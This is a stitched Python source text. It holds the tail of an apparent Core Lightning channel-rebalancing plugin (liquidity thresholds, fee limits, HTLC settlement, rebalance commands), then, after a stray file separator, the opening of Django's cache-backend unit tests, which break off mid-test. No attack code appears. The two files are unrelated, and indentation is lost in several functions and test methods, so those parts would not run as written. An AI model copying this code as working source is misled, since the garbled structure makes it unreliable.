        # once even the smallest remaining channel can hold the threshold on
        # its lighter side, the current ratio works for all remaining channels
        if smallest_channel["total_msat"] * min(ratio, 1 - ratio) > enough_liquidity:
            break
        # peel the smallest channel off, clamping its share of our liquidity
        # between min_liquidity and capacity - min_liquidity
        min_liquidity = min(smallest_channel["total_msat"] / 2, enough_liquidity)
        diff = smallest_channel["total_msat"] * ratio
        diff = max(diff, min_liquidity)
        diff = min(diff, smallest_channel["total_msat"] - min_liquidity)
        our -= diff
        total -= smallest_channel["total_msat"]
        chs.remove(smallest_channel)
    assert 0 <= ratio and ratio <= 1
    return ratio
def feeadjust_would_be_nice(plugin: Plugin):
    """Run the feeadjuster plugin's `feeadjust` command once, if that plugin
    is installed; otherwise just log that it would be useful."""
    matches = [c for c in plugin.rpc.help().get("help")
               if c["command"].split()[0] == "feeadjust"]
    if len(matches) == 1:
        msg = plugin.rpc.feeadjust()
        plugin.log(f"Feeadjust succeeded: {msg}")
    else:
        plugin.log("The feeadjuster plugin would be useful here")
def get_max_amount(i: int, plugin: Plugin):
    """Amount cap for the i-th rebalance attempt: shrinks geometrically
    (divide by 4 per step) but never drops below the configured minimum."""
    shrinking_cap = plugin.enough_liquidity / (4**(i + 1))
    return max(plugin.min_amount, shrinking_cap)
def get_max_fee(plugin: Plugin, msat: Millisatoshi):
    """Fee budget for rebalancing `msat`: our own fee schedule (base + ppm)
    scaled by the configured feeratio."""
    # TODO: sanity check
    own_fee = plugin.fee_base + msat * plugin.fee_ppm / 10**6
    return own_fee * plugin.feeratio
def get_chan(plugin: Plugin, scid: str):
    """Find the channel dict for `scid` across all peers; implicitly returns
    None when no peer has such a channel."""
    for peer in plugin.rpc.listpeers()["peers"]:
        # We might have multiple channel entries! Eg if one was just closed
        # and reopened, so scan them all.
        for chan in peer["channels"]:
            if chan.get("short_channel_id") == scid:
                return chan
def liquidity_info(channel, enough_liquidity: Millisatoshi, ideal_ratio: float):
    """Assemble the liquidity view of one channel: actual our/their amounts,
    min/max bounds derived from the global threshold, and the ideal split
    (ratio-based, clamped into [min, max])."""
    total = channel["total_msat"]
    ours = channel["to_us_msat"]
    lo = min(enough_liquidity, total / 2)
    hi = max(a_minus_b(total, enough_liquidity), total / 2)

    def clamp(value):
        return min(max(value, lo), hi)

    return {
        "our": ours,
        "their": total - ours,
        "min": lo,
        "max": hi,
        "ideal": {
            "our": clamp(total * ideal_ratio),
            "their": clamp(total * (1 - ideal_ratio)),
        },
    }
def wait_for(success, timeout: int = 60):
    """Poll `success()` with exponential backoff (0.25s doubling, capped at
    5s) until it returns truthy or `timeout` seconds elapse. Returns True on
    success, False on timeout.
    Taken and modified from pyln-testing/pyln/testing/utils.py."""
    deadline = time.time() + timeout
    delay = 0.25
    while not success():
        remaining = deadline - time.time()
        if remaining <= 0:
            return False
        # never sleep past the deadline
        time.sleep(min(delay, remaining))
        delay = min(delay * 2, 5)
    return True
def wait_for_htlcs(plugin, failed_channels: list, scids: list = None):
    """Wait until pending HTLCs on the given channels (all channels when
    `scids` is None) are settled; channels already listed in `failed_channels`
    are skipped and new timeouts are appended to it. Returns True only when
    every considered channel settled."""
    # HTLC settlement helper
    # taken and modified from pyln-testing/pyln/testing/utils.py
    result = True
    peers = plugin.rpc.listpeers()['peers']
    for p, peer in enumerate(peers):
        if 'channels' in peer:
            for c, channel in enumerate(peer['channels']):
                if scids is not None and channel.get('short_channel_id') not in scids:
                    continue
                if channel.get('short_channel_id') in failed_channels:
                    result = False
                    continue
                if 'htlcs' in channel:
                    # the lambda re-polls listpeers each time so it sees fresh
                    # htlc state; p and c index into that fresh result
                    if not wait_for(lambda: len(plugin.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0):
                        failed_channels.append(channel.get('short_channel_id'))
                        plugin.log(f"Timeout while waiting for htlc settlement in channel {channel.get('short_channel_id')}")
                        result = False
    return result
def maybe_rebalance_pairs(plugin: Plugin, ch1, ch2, failed_channels: list):
    """Repeatedly rebalance from ch1 to ch2 while it improves liquidity,
    shrinking the attempt amount after failures; returns a dict with
    'success' and total 'fee_spent'. Failed pairs are memorized in
    `failed_channels` as "scid1:scid2" strings."""
    scid1 = ch1["short_channel_id"]
    scid2 = ch2["short_channel_id"]
    result = {"success": False, "fee_spent": Millisatoshi(0)}
    if scid1 + ":" + scid2 in failed_channels:
        return result
    # check if HTLCs are settled
    if not wait_for_htlcs(plugin, failed_channels, [scid1, scid2]):
        return result
    i = 0
    while not plugin.rebalance_stop:
        liquidity1 = liquidity_info(ch1, plugin.enough_liquidity, plugin.ideal_ratio)
        liquidity2 = liquidity_info(ch2, plugin.enough_liquidity, plugin.ideal_ratio)
        # pick the largest amount any of the must/should/could pairings allows
        amount1 = min(must_send(liquidity1), could_receive(liquidity2))
        amount2 = min(should_send(liquidity1), should_receive(liquidity2))
        amount3 = min(could_send(liquidity1), must_receive(liquidity2))
        amount = max(amount1, amount2, amount3)
        if amount < plugin.min_amount:
            return result
        # cap by the per-attempt shrinking limit
        amount = min(amount, get_max_amount(i, plugin))
        maxfee = get_max_fee(plugin, amount)
        plugin.log(f"Try to rebalance: {scid1} -> {scid2}; amount={amount}; maxfee={maxfee}")
        start_ts = time.time()
        try:
            res = rebalance(plugin, outgoing_scid=scid1, incoming_scid=scid2,
                            msatoshi=amount, retry_for=1200, maxfeepercent=0,
                            exemptfee=maxfee)
            if not res.get('status') == 'complete':
                raise Exception  # fall into exception handler below
        except Exception:
            failed_channels.append(scid1 + ":" + scid2)
            # rebalance failed, let's try with a smaller amount
            while (get_max_amount(i, plugin) >= amount and
                   get_max_amount(i, plugin) != get_max_amount(i + 1, plugin)):
                i += 1
            if amount > get_max_amount(i, plugin):
                continue
            return result
        result["success"] = True
        result["fee_spent"] += res["fee"]
        htlc_start_ts = time.time()
        # wait for settlement
        htlc_success = wait_for_htlcs(plugin, failed_channels, [scid1, scid2])
        current_ts = time.time()
        res["elapsed_time"] = str(timedelta(seconds=current_ts - start_ts))[:-3]
        res["htlc_time"] = str(timedelta(seconds=current_ts - htlc_start_ts))[:-3]
        plugin.log(f"Rebalance succeeded: {res}")
        if not htlc_success:
            return result
        # refresh channel state before the next iteration of the loop
        ch1 = get_chan(plugin, scid1)
        assert ch1 is not None
        ch2 = get_chan(plugin, scid2)
        assert ch2 is not None
    return result
def maybe_rebalance_once(plugin: Plugin, failed_channels: list):
    """Try every ordered pair of open channels until one rebalance succeeds or
    a stop is requested; returns that pair's result, or a failure record when
    no pair produced an improvement."""
    channels = get_open_channels(plugin)
    for sender in channels:
        for receiver in channels:
            if sender == receiver:
                continue
            outcome = maybe_rebalance_pairs(plugin, sender, receiver, failed_channels)
            if outcome["success"] or plugin.rebalance_stop:
                return outcome
    return {"success": False, "fee_spent": Millisatoshi(0)}
def feeadjuster_toggle(plugin: Plugin, new_value: bool):
    """Set the feeadjuster plugin's forward-event subscription to `new_value`
    (when that plugin is installed) and return its previous state; returns
    True when the plugin is absent."""
    matches = [c for c in plugin.rpc.help().get("help")
               if c["command"].split()[0] == "feeadjuster-toggle"]
    if len(matches) != 1:
        return True
    msg = plugin.rpc.feeadjuster_toggle(new_value)
    return msg["forward_event_subscription"]["previous"]
def rebalanceall_thread(plugin: Plugin):
    """Background worker for `rebalanceall`: holds plugin.mutex for the whole
    run and keeps rebalancing channel pairs until no improvement is found or
    plugin.rebalance_stop is set (rebalancestop synchronizes on the mutex)."""
    if not plugin.mutex.acquire(blocking=False):
        # another run is already in progress
        return
    try:
        start_ts = time.time()
        # pause the feeadjuster (if present) while we shuffle liquidity
        feeadjuster_state = feeadjuster_toggle(plugin, False)
        channels = get_open_channels(plugin)
        plugin.enough_liquidity = get_enough_liquidity_threshold(channels)
        plugin.ideal_ratio = get_ideal_ratio(channels, plugin.enough_liquidity)
        plugin.log(f"Automatic rebalance is running with enough liquidity threshold: {plugin.enough_liquidity}, "
                   f"ideal liquidity ratio: {plugin.ideal_ratio * 100:.2f}%, "
                   f"min rebalancable amount: {plugin.min_amount}, "
                   f"feeratio: {plugin.feeratio}")
        failed_channels = []
        success = 0
        fee_spent = Millisatoshi(0)
        while not plugin.rebalance_stop:
            result = maybe_rebalance_once(plugin, failed_channels)
            if not result["success"]:
                # no pair could be improved any further: we are done
                break
            success += 1
            fee_spent += result["fee_spent"]
        feeadjust_would_be_nice(plugin)
        # restore the feeadjuster to its previous state
        feeadjuster_toggle(plugin, feeadjuster_state)
        elapsed_time = timedelta(seconds=time.time() - start_ts)
        plugin.rebalanceall_msg = f"Automatic rebalance finished: {success} successful rebalance, {fee_spent} fee spent, it took {str(elapsed_time)[:-3]}"
        plugin.log(plugin.rebalanceall_msg)
    finally:
        plugin.mutex.release()
@plugin.method("rebalanceall")
def rebalanceall(plugin: Plugin, min_amount: Millisatoshi = Millisatoshi("50000sat"), feeratio: float = 0.5):
    """Rebalance all unbalanced channels if possible for a very low fee.
    Default minimum rebalancable amount is 50000sat. Default feeratio = 0.5, half of our node's default fee.
    To be economical, it tries to fix the liquidity cheaper than it can be ruined by transaction forwards.
    It may run for a long time (hours) in the background, but can be stopped with the rebalancestop method.
    """
    # some early checks before we start the async thread
    if plugin.mutex.locked():
        return {"message": "Rebalance is already running, this may take a while. To stop it use the cli method 'rebalancestop'."}
    channels = get_open_channels(plugin)
    if len(channels) <= 1:
        return {"message": "Error: Not enough open channels to rebalance anything"}
    our = sum(ch["to_us_msat"] for ch in channels)
    total = sum(ch["total_msat"] for ch in channels)
    min_amount = Millisatoshi(min_amount)
    # both sides of our aggregate liquidity must at least cover min_amount
    if total - our < min_amount or our < min_amount:
        return {"message": "Error: Not enough liquidity to rebalance anything"}
    # param parsing ensure correct type
    plugin.feeratio = float(feeratio)
    plugin.min_amount = min_amount
    # run the job; the worker holds plugin.mutex until it finishes
    t = Thread(target=rebalanceall_thread, args=(plugin, ))
    t.start()
    return {"message": f"Rebalance started with min rebalancable amount: {plugin.min_amount}, feeratio: {plugin.feeratio}"}
@plugin.method("rebalancestop")
def rebalancestop(plugin: Plugin):
"""It stops the ongoing rebalanceall.
"""
if not plugin.mutex.locked():
if plugin.rebalanceall_msg is None:
return {"message": "No rebalance is running, nothing to stop."}
return {"message": f"No rebalance is running, nothing to stop. "
f"Last 'rebalanceall' gave: {plugin.rebalanceall_msg}"}
plugin.rebalance_stop = True
plugin.mutex.acquire(blocking=True)
plugin.rebalance_stop = False
plugin.mutex.release()
return {"message": plugin.rebalanceall_msg}
def health_score(liquidity):
    """Score a channel's liquidity health on a 0..100 scale.

    The score combines how close the channel is to its ideal liquidity
    split (mapped to 50..100) with how far it is from being depleted below
    the minimal liquidity (a 0..1 factor). Any zero ideal or zero minimum
    yields a score of 0.
    """
    ideal_our = int(liquidity["ideal"]["our"])
    ideal_their = int(liquidity["ideal"]["their"])
    minimum = int(liquidity["min"])
    if ideal_our == 0 or ideal_their == 0 or minimum == 0:
        return 0
    our = int(liquidity["our"])
    their = int(liquidity["their"])
    # distance from ideal liquidity (between 50 and 100)
    balance_score = 50 + 50 * min(our / ideal_our, their / ideal_their)
    # distance from minimal liquidity as a coefficient (between 0 and 1)
    depletion_factor = min(our / minimum, their / minimum, 1)
    return balance_score * depletion_factor
def get_avg_forward_fees(plugin: Plugin, intervals):
    """Compute average forward fees (ppm) over several look-back windows.

    `intervals` is a list of windows in days; the result is a list of the
    same length, each entry holding the average fee in ppm of the amount
    forwarded by settled forwards resolved within that window (0 when no
    forwards match).
    """
    now = time.time()
    day = 60 * 60 * 24
    longest_window = max(intervals) * day
    totals = [0] * len(intervals)
    fees = [0] * len(intervals)
    # Only settled forwards younger than the longest window matter.
    recent = [fwd for fwd in plugin.rpc.listforwards()["forwards"]
              if fwd.get("status") == "settled"
              and fwd.get("resolved_time", 0) + longest_window > now]
    # Accumulate forwarded amount and fee per interval.
    for fwd in recent:
        for idx, days in enumerate(intervals):
            if fwd["resolved_time"] + days * day >= now:
                totals[idx] += fwd["out_msat"]
                fees[idx] += fwd["fee_msat"]
    # Average each interval, guarding against empty windows.
    return [fees[idx] / totals[idx] * 10**6 if int(totals[idx]) > 0 else 0
            for idx in range(len(intervals))]
@plugin.method("rebalancereport")
def rebalancereport(plugin: Plugin):
"""Show information about rebalance
"""
res = {}
res["rebalanceall_is_running"] = plugin.mutex.locked()
res["getroute_method"] = plugin.getroute.__name__
res["maxhops_threshold"] = plugin.maxhops
res["msatfactor"] = plugin.msatfactor
res["erringnodes_threshold"] = plugin.erringnodes
channels = get_open_channels(plugin)
health_percent = 0.0
if len(channels) > 1:
enough_liquidity = get_enough_liquidity_threshold(channels)
ideal_ratio = get_ideal_ratio(channels, enough_liquidity)
res["enough_liquidity_threshold"] = enough_liquidity
res["ideal_liquidity_ratio"] = f"{ideal_ratio * 100:.2f}%"
for ch in channels:
liquidity = liquidity_info(ch, enough_liquidity, ideal_ratio)
health_percent += health_score(liquidity) * int(ch["total_msat"])
health_percent /= int(sum(ch["total_msat"] for ch in channels))
else:
res["enough_liquidity_threshold"] = Millisatoshi(0)
res["ideal_liquidity_ratio"] = "0%"
res["liquidity_health"] = f"{health_percent:.2f}%"
invoices = plugin.rpc.listinvoices()['invoices']
rebalances = [i for i in invoices if i.get('status') == 'paid' and i.get('label').startswith("Rebalance")]
total_fee = Millisatoshi(0)
total_amount = Millisatoshi(0)
res["total_successful_rebalances"] = len(rebalances)
for r in rebalances:
try:
pay = plugin.rpc.listpays(r["bolt11"])["pays"][0]
total_amount += pay["amount_msat"]
total_fee += pay["amount_sent_msat"] - pay["amount_msat"]
except Exception:
res["total_successful_rebalances"] -= 1
res["total_rebalanced_amount"] = total_amount
res["total_rebalance_fee"] = total_fee
if total_amount > Millisatoshi(0):
res["average_rebalance_fee_ppm"] = round(total_fee / total_amount * 10**6, 2)
else:
res["average_rebalance_fee_ppm"] = 0
avg_forward_fees = get_avg_forward_fees(plugin, [1, 7, 30])
res['average_forward_fee_ppm_1d'] = avg_forward_fees[0]
res['average_forward_fee_ppm_7d'] = avg_forward_fees[1]
res['average_forward_fee_ppm_30d'] = avg_forward_fees[2]
return res
@plugin.init()
def init(options, configuration, plugin):
    # Read our node's fee configuration; the rebalance economy checks are
    # based on these defaults.
    config = plugin.rpc.listconfigs()
    plugin.cltv_final = config.get("cltv-final")
    plugin.fee_base = Millisatoshi(config.get("fee-base"))
    plugin.fee_ppm = config.get("fee-per-satoshi")
    # Serializes automatic rebalance runs (see rebalanceall_thread).
    plugin.mutex = Lock()
    # Option values arrive as strings; convert to their numeric types.
    plugin.maxhops = int(options.get("rebalance-maxhops"))
    plugin.msatfactor = float(options.get("rebalance-msatfactor"))
    plugin.erringnodes = int(options.get("rebalance-erringnodes"))
    plugin.getroute = getroute_switch(options.get("rebalance-getroute"))
    # Holds the summary message of the last finished rebalanceall run.
    plugin.rebalanceall_msg = None
    plugin.log(f"Plugin rebalance initialized with {plugin.fee_base} base / {plugin.fee_ppm} ppm fee "
               f"cltv_final:{plugin.cltv_final} "
               f"maxhops:{plugin.maxhops} "
               f"msatfactor:{plugin.msatfactor} "
               f"erringnodes:{plugin.erringnodes} "
               f"getroute:{plugin.getroute.__name__} ")
# Register the plugin's configuration options, then enter the plugin's
# main loop (plugin.run() blocks, serving RPC requests from lightningd).
plugin.add_option(
    "rebalance-getroute",
    "iterative",
    # Fixed: the original concatenated string lacked a space after
    # "'iterative'.", producing "...'iterative'.'basic': ..." in help output.
    "Getroute method for route search can be 'basic' or 'iterative'. "
    "'basic': Tries all routes sequentially. "
    "'iterative': Tries shorter and bigger routes first.",
    "string"
)
plugin.add_option(
    "rebalance-maxhops",
    "5",
    "Maximum number of hops for `getroute` call. Set to 0 to disable. "
    "Note: Two hops are added for own nodes input and output channel. "
    # Fixed grammar: "a 8 or more hops" -> "8 or more hops".
    "Note: Routes with 8 or more hops have less than 3% success rate.",
    "string"
)
plugin.add_option(
    "rebalance-msatfactor",
    "4",
    "Will instruct `getroute` call to use higher requested capacity first. "
    "Note: This will decrease to 1 when no routes can be found.",
    "string"
)
plugin.add_option(
    "rebalance-erringnodes",
    "5",
    "Exclude nodes from routing that raised N or more errors. "
    "Note: Use 0 to disable.",
    "string"
)
plugin.run()
|
tests.py | # Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
ignore_warnings, override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.deprecation import RemovedInDjango21Warning
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
    """Module-level function fixture used by the complex-data-type tests."""
    return 42
class C:
    """Class fixture used by the complex-data-type cache tests."""

    def m(n):
        # Deliberately takes the instance as `n` (no conventional `self`).
        return 24
class Unpicklable:
    """Fixture whose instances refuse to be pickled."""

    def __getstate__(self):
        # pickle calls __getstate__ during dumps(); raising here makes
        # every pickling attempt fail.
        raise pickle.PickleError()
@override_settings(CACHES={
    'default': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
    }
})
class DummyCacheTests(SimpleTestCase):
    # The Dummy cache backend doesn't really behave like a test backend,
    # so it has its own test case: it accepts every operation but never
    # stores anything.
    def test_simple(self):
        "Dummy cache backend ignores cache set calls"
        cache.set("key", "value")
        self.assertIsNone(cache.get("key"))

    def test_add(self):
        "Add doesn't do anything in dummy cache backend"
        cache.add("addkey1", "value")
        result = cache.add("addkey1", "newvalue")
        # add() reports success even though nothing was stored
        self.assertTrue(result)
        self.assertIsNone(cache.get("addkey1"))

    def test_non_existent(self):
        "Nonexistent keys aren't found in the dummy cache backend"
        self.assertIsNone(cache.get("does_not_exist"))
        self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")

    def test_get_many(self):
        "get_many returns nothing for the dummy cache backend"
        cache.set('a', 'a')
        cache.set('b', 'b')
        cache.set('c', 'c')
        cache.set('d', 'd')
        self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
        self.assertEqual(cache.get_many(['a', 'b', 'e']), {})

    def test_delete(self):
        "Cache deletion is transparently ignored on the dummy cache backend"
        cache.set("key1", "spam")
        cache.set("key2", "eggs")
        self.assertIsNone(cache.get("key1"))
        cache.delete("key1")
        self.assertIsNone(cache.get("key1"))
        self.assertIsNone(cache.get("key2"))

    def test_has_key(self):
        "The has_key method doesn't ever return True for the dummy cache backend"
        cache.set("hello1", "goodbye1")
        self.assertFalse(cache.has_key("hello1"))
        self.assertFalse(cache.has_key("goodbye1"))

    def test_in(self):
        "The in operator doesn't ever return True for the dummy cache backend"
        cache.set("hello2", "goodbye2")
        self.assertNotIn("hello2", cache)
        self.assertNotIn("goodbye2", cache)

    def test_incr(self):
        "Dummy cache values can't be incremented"
        cache.set('answer', 42)
        # incr() raises because the key is never actually present
        with self.assertRaises(ValueError):
            cache.incr('answer')
        with self.assertRaises(ValueError):
            cache.incr('does_not_exist')

    def test_decr(self):
        "Dummy cache values can't be decremented"
        cache.set('answer', 42)
        with self.assertRaises(ValueError):
            cache.decr('answer')
        with self.assertRaises(ValueError):
            cache.decr('does_not_exist')

    def test_data_types(self):
        "All data types are ignored equally by the dummy cache"
        stuff = {
            'string': 'this is a string',
            'int': 42,
            'list': [1, 2, 3, 4],
            'tuple': (1, 2, 3, 4),
            'dict': {'A': 1, 'B': 2},
            'function': f,
            'class': C,
        }
        cache.set("stuff", stuff)
        self.assertIsNone(cache.get("stuff"))

    def test_expiration(self):
        "Expiration has no effect on the dummy cache"
        cache.set('expire1', 'very quickly', 1)
        cache.set('expire2', 'very quickly', 1)
        cache.set('expire3', 'very quickly', 1)
        time.sleep(2)
        self.assertIsNone(cache.get("expire1"))
        cache.add("expire2", "newvalue")
        self.assertIsNone(cache.get("expire2"))
        self.assertFalse(cache.has_key("expire3"))

    def test_unicode(self):
        "Unicode values are ignored by the dummy cache"
        stuff = {
            'ascii': 'ascii_value',
            'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
            'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
            'ascii2': {'x': 1}
        }
        for (key, value) in stuff.items():
            with self.subTest(key=key):
                cache.set(key, value)
                self.assertIsNone(cache.get(key))

    def test_set_many(self):
        "set_many does nothing for the dummy cache backend"
        cache.set_many({'a': 1, 'b': 2})
        cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')

    def test_delete_many(self):
        "delete_many does nothing for the dummy cache backend"
        cache.delete_many(['a', 'b'])

    def test_clear(self):
        "clear does nothing for the dummy cache backend"
        cache.clear()

    def test_incr_version(self):
        "Dummy cache versions can't be incremented"
        cache.set('answer', 42)
        with self.assertRaises(ValueError):
            cache.incr_version('answer')
        with self.assertRaises(ValueError):
            cache.incr_version('does_not_exist')

    def test_decr_version(self):
        "Dummy cache versions can't be decremented"
        cache.set('answer', 42)
        with self.assertRaises(ValueError):
            cache.decr_version('answer')
        with self.assertRaises(ValueError):
            cache.decr_version('does_not_exist')

    def test_get_or_set(self):
        # get_or_set() always falls back to (and returns) the default
        self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
        self.assertEqual(cache.get_or_set('mykey', None), None)

    def test_get_or_set_callable(self):
        def my_callable():
            return 'default'

        # Both a callable default and its return value behave the same
        self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
        self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
    """A customized cache key function used by the 'custom_key' aliases."""
    return f'CUSTOM-{key_prefix}-{version}-{key}'
# Per-alias cache configuration fragments merged by caches_setting_for_tests().
_caches_setting_base = {
    'default': {},
    # Keyed by pid so concurrent test runs don't collide on shared backends.
    'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
    'v2': {'VERSION': 2},
    'custom_key': {'KEY_FUNCTION': custom_key_func},
    # Same key function, referenced by dotted path instead of callable.
    'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
    'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
    'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
    """Build a CACHES setting dict covering the test aliases.

    `base` pulls in shared config (e.g. the memcached config from the
    original settings), `exclude` is a set of alias names from
    `_caches_setting_base` to omit, and `params` are test-specific
    overrides. Precedence: params -> _caches_setting_base -> base.
    """
    shared = base or {}
    excluded = exclude or set()
    setting = {}
    for alias, alias_params in _caches_setting_base.items():
        if alias in excluded:
            continue
        merged = dict(shared)
        merged.update(alias_params)
        merged.update(params)
        setting[alias] = merged
    return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
def setUp(self):
    # Fresh RequestFactory per test for building mock requests.
    self.factory = RequestFactory()
def tearDown(self):
    # Wipe the shared cache so no state leaks between tests.
    cache.clear()
def test_simple(self):
    # Simple cache set/get works
    cache.set("key", "value")
    self.assertEqual(cache.get("key"), "value")
def test_add(self):
    # A key can be added to a cache; a second add() of the same key is a
    # no-op that reports failure and preserves the first value.
    cache.add("addkey1", "value")
    result = cache.add("addkey1", "newvalue")
    self.assertFalse(result)
    self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
    # Test for same cache key conflicts between shared backend
    cache.set('somekey', 'value')

    # should not be set in the prefixed cache
    self.assertFalse(caches['prefix'].has_key('somekey'))

    caches['prefix'].set('somekey', 'value2')

    # each alias sees only its own value for the same key
    self.assertEqual(cache.get('somekey'), 'value')
    self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
    """Nonexistent cache keys return as None/default."""
    self.assertIsNone(cache.get("does_not_exist"))
    self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
    # Multiple cache keys can be returned using get_many; missing keys
    # are simply absent from the result dict.
    cache.set('a', 'a')
    cache.set('b', 'b')
    cache.set('c', 'c')
    cache.set('d', 'd')
    self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
    self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
    # Cache keys can be deleted without affecting other keys
    cache.set("key1", "spam")
    cache.set("key2", "eggs")
    self.assertEqual(cache.get("key1"), "spam")
    cache.delete("key1")
    self.assertIsNone(cache.get("key1"))
    self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
    # The cache can be inspected for cache keys, including keys stored
    # with a None (never-expire) timeout
    cache.set("hello1", "goodbye1")
    self.assertTrue(cache.has_key("hello1"))
    self.assertFalse(cache.has_key("goodbye1"))
    cache.set("no_expiry", "here", None)
    self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
    # The in operator can be used to inspect cache contents
    cache.set("hello2", "goodbye2")
    self.assertIn("hello2", cache)
    self.assertNotIn("goodbye2", cache)
def test_incr(self):
    # Cache values can be incremented; incr() returns the new value,
    # accepts an explicit (possibly negative) delta, and raises for
    # missing keys.
    cache.set('answer', 41)
    self.assertEqual(cache.incr('answer'), 42)
    self.assertEqual(cache.get('answer'), 42)
    self.assertEqual(cache.incr('answer', 10), 52)
    self.assertEqual(cache.get('answer'), 52)
    self.assertEqual(cache.incr('answer', -10), 42)
    with self.assertRaises(ValueError):
        cache.incr('does_not_exist')
def test_decr(self):
    # Cache values can be decremented; mirror of test_incr.
    cache.set('answer', 43)
    self.assertEqual(cache.decr('answer'), 42)
    self.assertEqual(cache.get('answer'), 42)
    self.assertEqual(cache.decr('answer', 10), 32)
    self.assertEqual(cache.get('answer'), 32)
    self.assertEqual(cache.decr('answer', -10), 42)
    with self.assertRaises(ValueError):
        cache.decr('does_not_exist')
def test_close(self):
    # Every backend must expose a callable close() hook.
    self.assertTrue(hasattr(cache, 'close'))
    cache.close()
def test_data_types(self):
    # Many different data types can be cached and round-trip unchanged
    stuff = {
        'string': 'this is a string',
        'int': 42,
        'list': [1, 2, 3, 4],
        'tuple': (1, 2, 3, 4),
        'dict': {'A': 1, 'B': 2},
        'function': f,
        'class': C,
    }
    cache.set("stuff", stuff)
    self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
    # Don't want fields with callable as default to be called on cache read
    expensive_calculation.num_runs = 0
    Poll.objects.all().delete()
    my_poll = Poll.objects.create(question="Well?")
    self.assertEqual(Poll.objects.count(), 1)
    pub_date = my_poll.pub_date
    cache.set('question', my_poll)
    cached_poll = cache.get('question')
    self.assertEqual(cached_poll.pub_date, pub_date)
    # We only want the default expensive calculation run once
    self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
    # Don't want fields with callable as default to be called on cache write
    expensive_calculation.num_runs = 0
    Poll.objects.all().delete()
    Poll.objects.create(question="What?")
    self.assertEqual(expensive_calculation.num_runs, 1)
    defer_qs = Poll.objects.all().defer('question')
    self.assertEqual(defer_qs.count(), 1)
    self.assertEqual(expensive_calculation.num_runs, 1)
    cache.set('deferred_queryset', defer_qs)
    # cache set should not re-evaluate default functions
    self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
    # Don't want fields with callable as default to be called on cache read
    expensive_calculation.num_runs = 0
    Poll.objects.all().delete()
    Poll.objects.create(question="What?")
    self.assertEqual(expensive_calculation.num_runs, 1)
    defer_qs = Poll.objects.all().defer('question')
    self.assertEqual(defer_qs.count(), 1)
    cache.set('deferred_queryset', defer_qs)
    self.assertEqual(expensive_calculation.num_runs, 1)
    runs_before_cache_read = expensive_calculation.num_runs
    cache.get('deferred_queryset')
    # We only want the default expensive calculation run on creation and set
    self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
    # Cache values can be set to expire; after expiry, get() misses and
    # add() succeeds as if the key never existed.
    cache.set('expire1', 'very quickly', 1)
    cache.set('expire2', 'very quickly', 1)
    cache.set('expire3', 'very quickly', 1)

    time.sleep(2)
    self.assertIsNone(cache.get("expire1"))

    cache.add("expire2", "newvalue")
    self.assertEqual(cache.get("expire2"), "newvalue")
    self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
    # Unicode values can be cached via set, add and set_many alike
    stuff = {
        'ascii': 'ascii_value',
        'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
        'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
        'ascii2': {'x': 1}
    }
    # Test `set`
    for (key, value) in stuff.items():
        with self.subTest(key=key):
            cache.set(key, value)
            self.assertEqual(cache.get(key), value)

    # Test `add`
    for (key, value) in stuff.items():
        with self.subTest(key=key):
            cache.delete(key)
            cache.add(key, value)
            self.assertEqual(cache.get(key), value)

    # Test `set_many`
    for (key, value) in stuff.items():
        cache.delete(key)
    cache.set_many(stuff)
    for (key, value) in stuff.items():
        with self.subTest(key=key):
            self.assertEqual(cache.get(key), value)
def test_binary_string(self):
    # Binary strings should be cacheable
    from zlib import compress, decompress
    value = 'value_to_be_compressed'
    compressed_value = compress(value.encode())

    # Test set
    cache.set('binary1', compressed_value)
